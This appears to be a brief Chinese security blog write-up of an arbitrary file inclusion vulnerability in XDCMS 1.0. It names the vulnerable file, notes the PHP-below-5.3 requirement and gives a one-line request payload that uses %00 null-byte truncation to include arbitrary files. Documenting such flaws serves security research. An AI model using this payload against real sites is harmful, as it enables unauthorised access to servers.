# XDCMS 1.0 任意文件包含漏洞
### 一、漏洞简介
要求PHP版本小于5.3,否则无法使用%00截断
### 二、漏洞影响
XDCMS 1.0
### 三、复现过程
漏洞文件:api\index.php
![](/static/lingzu/images/15896413819815.jpg)
![](/static/lingzu/images/15896413867175.jpg)
安全过滤函数 发生鸡肋
很明显 %00截断
“`
http://url/api/index.php?c=xxxxxx%00dama.php
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容